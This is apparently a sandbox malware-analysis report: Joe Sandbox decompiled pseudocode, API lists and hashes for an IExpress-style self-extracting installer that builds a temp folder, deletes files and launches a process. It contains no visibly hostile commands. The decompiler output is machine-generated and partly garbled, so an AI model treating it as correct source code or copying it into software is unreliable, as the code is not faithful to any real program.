• Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_970000_file.jbxd
Similarity
• API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
• String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
• API String ID: 2126469477-1173327654
• Opcode ID: a0bddac08f4cc641256d52fa32646f8a53dcbc9631c0a71febcd925dbe71cdf7
• Instruction ID: dfa544c9ee34829a2f0fd9f2696fa42cd0f2b5cab4841b87aafb8820de76a782
• Opcode Fuzzy Hash: a0bddac08f4cc641256d52fa32646f8a53dcbc9631c0a71febcd925dbe71cdf7
• Instruction Fuzzy Hash: 6C41D133A242058ADB34AB35AD4A76A33ACDBC5B51F10C475E94DC2191EF74CEC0EA61
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                                                                                                              			E00975467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t10;
                                                                                                                                                                                                                                              				void* _t13;
                                                                                                                                                                                                                                              				intOrPtr _t14;
                                                                                                                                                                                                                                              				void* _t16;
                                                                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                                                                              				signed int _t26;
                                                                                                                                                                                                                                              				void* _t28;
                                                                                                                                                                                                                                              				void* _t29;
                                                                                                                                                                                                                                              				CHAR* _t48;
                                                                                                                                                                                                                                              				signed int _t49;
                                                                                                                                                                                                                                              				intOrPtr _t61;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t10 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				if(__edx == 0) {
                                                                                                                                                                                                                                              					_t48 = 0x9791e4;
                                                                                                                                                                                                                                              					_t42 = 0x104;
                                                                                                                                                                                                                                              					E00971680(0x9791e4, 0x104);
                                                                                                                                                                                                                                              					L14:
                                                                                                                                                                                                                                              					_t13 = E009758C8(_t48); // executed
                                                                                                                                                                                                                                              					if(_t13 != 0) {
                                                                                                                                                                                                                                              						L17:
                                                                                                                                                                                                                                              						_t42 = _a4;
                                                                                                                                                                                                                                              						if(_a4 == 0) {
                                                                                                                                                                                                                                              							L23:
                                                                                                                                                                                                                                              							 *0x979124 = 0;
                                                                                                                                                                                                                                              							_t14 = 1;
                                                                                                                                                                                                                                              							L24:
                                                                                                                                                                                                                                              							return E00976CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t16 = E0097597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                                                              						if(_t16 != 0) {
                                                                                                                                                                                                                                              							goto L23;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t61 =  *0x978a20; // 0x0
                                                                                                                                                                                                                                              						if(_t61 != 0) {
                                                                                                                                                                                                                                              							 *0x978a20 = 0;
                                                                                                                                                                                                                                              							RemoveDirectoryA(_t48);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						L22:
                                                                                                                                                                                                                                              						_t14 = 0;
                                                                                                                                                                                                                                              						goto L24;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                                                              						 *0x979124 = E00976285();
                                                                                                                                                                                                                                              						goto L22;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					 *0x978a20 = 1;
                                                                                                                                                                                                                                              					goto L17;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t42 =  &_v268;
                                                                                                                                                                                                                                              				_t20 = E009753A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                                                              				if(_t20 == 0) {
                                                                                                                                                                                                                                              					goto L22;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				_t48 = 0x9791e4;
                                                                                                                                                                                                                                              				E00971781(0x9791e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                                                              				if(( *0x979a34 & 0x00000020) == 0) {
                                                                                                                                                                                                                                              					L12:
                                                                                                                                                                                                                                              					_t42 = 0x104;
                                                                                                                                                                                                                                              					E0097658A(_t48, 0x104, 0x971140);
                                                                                                                                                                                                                                              					goto L14;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				GetSystemInfo( &_v304);
                                                                                                                                                                                                                                              				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                                                              				if(_t26 == 0) {
                                                                                                                                                                                                                                              					_push("i386");
                                                                                                                                                                                                                                              					L11:
                                                                                                                                                                                                                                              					E0097658A(_t48, 0x104);
                                                                                                                                                                                                                                              					goto L12;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t28 = _t26 - 1;
                                                                                                                                                                                                                                              				if(_t28 == 0) {
                                                                                                                                                                                                                                              					_push("mips");
                                                                                                                                                                                                                                              					goto L11;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t29 = _t28 - 1;
                                                                                                                                                                                                                                              				if(_t29 == 0) {
                                                                                                                                                                                                                                              					_push("alpha");
                                                                                                                                                                                                                                              					goto L11;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_t29 != 1) {
                                                                                                                                                                                                                                              					goto L12;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_push("ppc");
                                                                                                                                                                                                                                              				goto L11;
                                                                                                                                                                                                                                              			}





















                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 009754C9
                                                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0097553D
                                                                                                                                                                                                                                              • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0097556F
                                                                                                                                                                                                                                                • Part of subcall function 009753A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 009753FB
                                                                                                                                                                                                                                                • Part of subcall function 009753A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00975402
                                                                                                                                                                                                                                                • Part of subcall function 009753A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0097541F
                                                                                                                                                                                                                                                • Part of subcall function 009753A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0097542B
                                                                                                                                                                                                                                                • Part of subcall function 009753A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00975434
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                                                              • API String ID: 1979080616-3374052426
                                                                                                                                                                                                                                              • Opcode ID: 17c5421ee127b51727507889dfbb9679d7fe4422b08fc26d7d919f5334a312d3
                                                                                                                                                                                                                                              • Instruction ID: 6e9ef8b345a2a65a747774bead43e8d182207f23ead106752f47063e6b58fdc6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 17c5421ee127b51727507889dfbb9679d7fe4422b08fc26d7d919f5334a312d3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA314773B14A055BCB90AB399D05A7F739EABC2304B06C03AB40EC2590DBF4CE41D699
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%


                                                                                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                                                                                              			E00972390(CHAR* __ecx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v276;
                                                                                                                                                                                                                                              				char _v280;
                                                                                                                                                                                                                                              				char _v284;
                                                                                                                                                                                                                                              				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                                                              				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t21;
                                                                                                                                                                                                                                              				int _t36;
                                                                                                                                                                                                                                              				void* _t46;
                                                                                                                                                                                                                                              				void* _t62;
                                                                                                                                                                                                                                              				void* _t63;
                                                                                                                                                                                                                                              				CHAR* _t65;
                                                                                                                                                                                                                                              				void* _t66;
                                                                                                                                                                                                                                              				signed int _t67;
                                                                                                                                                                                                                                              				signed int _t69;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                                                              				_t21 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                                                              				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                                                              				_t65 = __ecx;
                                                                                                                                                                                                                                              				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                                                              					L10:
                                                                                                                                                                                                                                              					_pop(_t62);
                                                                                                                                                                                                                                              					_pop(_t66);
                                                                                                                                                                                                                                              					_pop(_t46);
                                                                                                                                                                                                                                              					return E00976CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					E00971680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                                                              					_t58 = 0x104;
                                                                                                                                                                                                                                              					E009716B3( &_v280, 0x104, "*");
                                                                                                                                                                                                                                              					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                                                              					_t63 = _t22;
                                                                                                                                                                                                                                              					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                                                              						goto L10;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						goto L3;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					do {
                                                                                                                                                                                                                                              						L3:
                                                                                                                                                                                                                                              						_t58 = 0x104;
                                                                                                                                                                                                                                              						E00971680( &_v276, 0x104, _t65);
                                                                                                                                                                                                                                              						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                                                              							_t58 = 0x104;
                                                                                                                                                                                                                                              							E009716B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                                                              							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                                                              							DeleteFileA( &_v280);
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                                                              								E009716B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                                                              								_t58 = 0x104;
                                                                                                                                                                                                                                              								E0097658A( &_v280, 0x104, 0x971140);
                                                                                                                                                                                                                                              								E00972390( &_v284);
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                                                              					} while (_t36 != 0);
                                                                                                                                                                                                                                              					FindClose(_t63); // executed
                                                                                                                                                                                                                                              					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                                                              					goto L10;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}





















                                                                                                                                                                                                                                              0x0097247a
                                                                                                                                                                                                                                              0x00972483
                                                                                                                                                                                                                                              0x00972495
                                                                                                                                                                                                                                              0x009724a3
                                                                                                                                                                                                                                              0x00972421
                                                                                                                                                                                                                                              0x0097242f
                                                                                                                                                                                                                                              0x00972453
                                                                                                                                                                                                                                              0x0097245d
                                                                                                                                                                                                                                              0x00972466
                                                                                                                                                                                                                                              0x00972472
                                                                                                                                                                                                                                              0x00972472
                                                                                                                                                                                                                                              0x0097242f
                                                                                                                                                                                                                                              0x009724af
                                                                                                                                                                                                                                              0x009724b5
                                                                                                                                                                                                                                              0x009724be
                                                                                                                                                                                                                                              0x009724c5
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009724c5

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FindFirstFileA.KERNELBASE(?,00978A3A,009711F4,00978A3A,00000000,?,?), ref: 009723F6
                                                                                                                                                                                                                                              • lstrcmpA.KERNEL32(?,009711F8), ref: 00972427
                                                                                                                                                                                                                                              • lstrcmpA.KERNEL32(?,009711FC), ref: 0097243B
                                                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00972495
                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 009724A3
                                                                                                                                                                                                                                              • FindNextFileA.KERNELBASE(00000000,00000010), ref: 009724AF
                                                                                                                                                                                                                                              • FindClose.KERNELBASE(00000000), ref: 009724BE
                                                                                                                                                                                                                                              • RemoveDirectoryA.KERNELBASE(00978A3A), ref: 009724C5
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 836429354-0
                                                                                                                                                                                                                                              • Opcode ID: ac2edc92634f18bc8061a3c81b442d2bae0f583b7af929dd4dd8e6efd5308e66
                                                                                                                                                                                                                                              • Instruction ID: d67da53f1eb5d7136005edce6215ec5154a25b3324c56a98849d952f833f7112
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac2edc92634f18bc8061a3c81b442d2bae0f583b7af929dd4dd8e6efd5308e66
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E3184336187409BD320EB68CC89BEF73ECABC5315F048D2DB59D86290EB349949C752
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 675 973fef-974010 676 974016-97403b CreateProcessA 675->676 677 97410a-97411a call 976ce0 675->677 678 9740c4-974101 call 976285 GetLastError FormatMessageA call 9744b9 676->678 679 974041-97406e WaitForSingleObject GetExitCodeProcess 676->679 693 974106 678->693 682 974091 call 97411b 679->682 683 974070-974077 679->683 688 974096-9740b8 CloseHandle * 2 682->688 683->682 686 974079-97407b 683->686 686->682 690 97407d-974089 686->690 691 9740ba-9740c0 688->691 692 974108 688->692 690->682 694 97408b 690->694 691->692 695 9740c2 691->695 692->677 693->692 694->682 695->693
                                                                                                                                                                                                                                              C-Code - Quality: 84%
                                                                                                                                                                                                                                              			E00973FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v524;
                                                                                                                                                                                                                                              				long _v528;
                                                                                                                                                                                                                                              				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t20;
                                                                                                                                                                                                                                              				void* _t22;
                                                                                                                                                                                                                                              				int _t25;
                                                                                                                                                                                                                                              				intOrPtr* _t39;
                                                                                                                                                                                                                                              				signed int _t44;
                                                                                                                                                                                                                                              				void* _t49;
                                                                                                                                                                                                                                              				signed int _t50;
                                                                                                                                                                                                                                              				intOrPtr _t53;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t45 = __edx;
                                                                                                                                                                                                                                              				_t20 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                                                              				_t39 = __ecx;
                                                                                                                                                                                                                                              				_t49 = 1;
                                                                                                                                                                                                                                              				_t22 = 0;
                                                                                                                                                                                                                                              				if(__ecx == 0) {
                                                                                                                                                                                                                                              					L13:
                                                                                                                                                                                                                                              					return E00976CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                                                                              				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                                                              				if(_t25 == 0) {
                                                                                                                                                                                                                                              					 *0x979124 = E00976285();
                                                                                                                                                                                                                                              					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
                                                                                                                                                                                                                                              					_t45 = 0x4c4;
                                                                                                                                                                                                                                              					E009744B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
                                                                                                                                                                                                                                              					L11:
                                                                                                                                                                                                                                              					_t49 = 0;
                                                                                                                                                                                                                                              					L12:
                                                                                                                                                                                                                                              					_t22 = _t49;
                                                                                                                                                                                                                                              					goto L13;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                                                              				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                                                              				_t44 = _v528;
                                                                                                                                                                                                                                              				_t53 =  *0x978a28; // 0x0
                                                                                                                                                                                                                                              				if(_t53 == 0) {
                                                                                                                                                                                                                                              					_t34 =  *0x979a2c; // 0x0
                                                                                                                                                                                                                                              					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                                                              						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                                                              						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                                                              							 *0x979a2c = _t44;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				E0097411B(_t34, _t44);
                                                                                                                                                                                                                                              				CloseHandle(_v544.hThread);
                                                                                                                                                                                                                                              				CloseHandle(_v544);
                                                                                                                                                                                                                                              				if(( *0x979a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                                                              					goto L12;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					goto L11;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}



















                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateProcessA.KERNELBASE ref: 00974033
                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00974049
                                                                                                                                                                                                                                              • GetExitCodeProcess.KERNELBASE ref: 0097405C
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0097409C
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 009740A8
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 009740DC
                                                                                                                                                                                                                                              • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 009740E9
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
• Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3183975587-0
                                                                                                                                                                                                                                              • Opcode ID: 873d1e743cd8b881b8554c0ac1c43340cf5b1c4fb71148e105c676b46dd7a0a9
                                                                                                                                                                                                                                              • Instruction ID: d1615619641f5b696784a5f1df48895a83d03e49fa770367be7840a19f358a07
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 873d1e743cd8b881b8554c0ac1c43340cf5b1c4fb71148e105c676b46dd7a0a9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E31BC33659208ABEB209B65DC48FAB777CEBD5711F1081A9F60DD21A2CB304CC1DB21
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 70%
                                                                                                                                                                                                                                              			E00972BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				void* __ebp;
                                                                                                                                                                                                                                              				long _t4;
                                                                                                                                                                                                                                              				void* _t6;
                                                                                                                                                                                                                                              				intOrPtr _t7;
                                                                                                                                                                                                                                              				void* _t9;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t12;
                                                                                                                                                                                                                                              				intOrPtr* _t17;
                                                                                                                                                                                                                                              				signed char _t19;
                                                                                                                                                                                                                                              				intOrPtr* _t21;
                                                                                                                                                                                                                                              				void* _t22;
                                                                                                                                                                                                                                              				void* _t24;
                                                                                                                                                                                                                                              				intOrPtr _t32;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t4 = GetVersion();
                                                                                                                                                                                                                                              				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                                                              					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                                                              					if(_t12 != 0) {
                                                                                                                                                                                                                                              						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                                                              						if(_t21 != 0) {
                                                                                                                                                                                                                                              							_t17 = _t21;
                                                                                                                                                                                                                                              							 *0x97a288(0, 1, 0, 0);
                                                                                                                                                                                                                                              							 *_t21();
                                                                                                                                                                                                                                              							_t29 = _t24 - _t24;
                                                                                                                                                                                                                                              							if(_t24 != _t24) {
                                                                                                                                                                                                                                              								_t17 = 4;
                                                                                                                                                                                                                                              								asm("int 0x29");
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t20 = _a12;
                                                                                                                                                                                                                                              				_t18 = _a4;
                                                                                                                                                                                                                                              				 *0x979124 = 0;
                                                                                                                                                                                                                                              				if(E00972CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                                                              					_t9 = E00972F1D(_t18, _t20); // executed
                                                                                                                                                                                                                                              					_t22 = _t9; // executed
                                                                                                                                                                                                                                              					E009752B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                                                              					if(_t22 != 0) {
                                                                                                                                                                                                                                              						_t32 =  *0x978a3a; // 0x0
                                                                                                                                                                                                                                              						if(_t32 == 0) {
                                                                                                                                                                                                                                              							_t19 =  *0x979a2c; // 0x0
                                                                                                                                                                                                                                              							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                                                              								E00971F90(_t19, _t21, _t22);
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t6 =  *0x978588; // 0x0
                                                                                                                                                                                                                                              				if(_t6 != 0) {
                                                                                                                                                                                                                                              					CloseHandle(_t6);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t7 =  *0x979124; // 0x80070002
                                                                                                                                                                                                                                              				return _t7;
                                                                                                                                                                                                                                              			}



















                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetVersion.KERNEL32(?,00000002,00000000,?,00976BB0,00970000,00000000,00000002,0000000A), ref: 00972C03
                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00976BB0,00970000,00000000,00000002,0000000A), ref: 00972C18
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00972C28
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00976BB0,00970000,00000000,00000002,0000000A), ref: 00972C98
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                                                              • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                                                              • API String ID: 62482547-3460614246
                                                                                                                                                                                                                                              • Opcode ID: 02965e6b5152e09b4700b718a3f84f49e0c7e071eebc72637586e7a3dba09184
                                                                                                                                                                                                                                              • Instruction ID: e9a7d0914b85ec1d4182782ba63af3736429f1db6484fc9ec441d408035d8ae6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 02965e6b5152e09b4700b718a3f84f49e0c7e071eebc72637586e7a3dba09184
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E1125333383055BE7226BB6AC89B2F376DDBD4394B0C8065F88CD3251EA30DC819669
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00976F40() {
                                                                                                                                                                                                                                              
